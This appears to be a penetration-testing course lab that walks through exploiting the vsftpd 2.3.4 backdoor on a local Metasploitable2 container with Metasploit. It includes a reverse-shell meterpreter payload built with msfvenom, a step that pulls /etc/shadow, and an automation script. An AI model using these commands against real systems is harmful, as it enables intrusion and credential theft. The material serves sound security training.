Skip to content

Latest commit

 

History

History
140 lines (101 loc) · 2.82 KB

File metadata and controls

140 lines (101 loc) · 2.82 KB

Lab 20 — Exploitation with Metasploit Framework

Exam objective: 4.1 Capability selection; 4.2 Network attacks with Metasploit; 4.10 Scripting and BAS.

In this lab you will use msfconsole end-to-end: search → use → set options → exploit → meterpreter. Target: Metasploitable2 vsftpd backdoor (CVE-2011-2523).


Step 1 — Spin up Metasploitable2

sudo docker run --rm -d --name msf2 -p 21:21 -p 4444:4444 tleemcjr/metasploitable2
TARGET=127.0.0.1

Step 2 — Start msfconsole and search

sudo msfdb init
msfconsole -q
msf6 > search vsftpd 2.3.4
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > info

info shows: description, references (CVE-2011-2523), targets, payloads, Rank: Excellent.


Step 3 — Configure and run

msf6 > set RHOSTS 127.0.0.1
msf6 > set RPORT 21
msf6 > show payloads
msf6 > set PAYLOAD cmd/unix/interact
msf6 > run

You should drop into a cmd shell as root.

id
uname -a

Step 4 — Upgrade to meterpreter (where supported)

For Linux meterpreter on a real target:

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST <your IP>
msf6 > set LPORT 4444
msf6 > run

Generate a matching binary:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<your IP> LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
# deliver and execute on target

Meterpreter built-ins:

meterpreter > sysinfo
meterpreter > getuid
meterpreter > download /etc/shadow
meterpreter > shell

Step 5 — Resource scripts (automation)

Save commands in pwn.rc:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 127.0.0.1
set PAYLOAD cmd/unix/interact
run
msfconsole -q -r pwn.rc

This is how BAS frameworks (Caldera, Atomic Red Team) chain exploits.


Step 6 — Module rank cheatsheet

Rank Meaning
Excellent Will not crash service
Great One-shot, reliable
Good Default reliable
Normal Reliable but specific
Average Less reliable
Low Likely to fail
Manual Requires user interaction

Always pick Excellent / Great in production tests — others may down the service.


Step 7 — Reporting metadata

For each successful exploit record:

Field Value
Module exploit/unix/ftp/vsftpd_234_backdoor
CVE CVE-2011-2523
CVSS v3.1 9.8 Critical
ATT&CK T1190 Exploit Public-Facing App
Payload cmd/unix/interact
Privilege root
Time-to-exploit <30 seconds

What you learned

  • The search → use → set → run Metasploit workflow.
  • The difference between exploit/, auxiliary/ and post/ modules.
  • How msfvenom generates payloads for exploit/multi/handler.
  • How .rc scripts automate chained exploitation.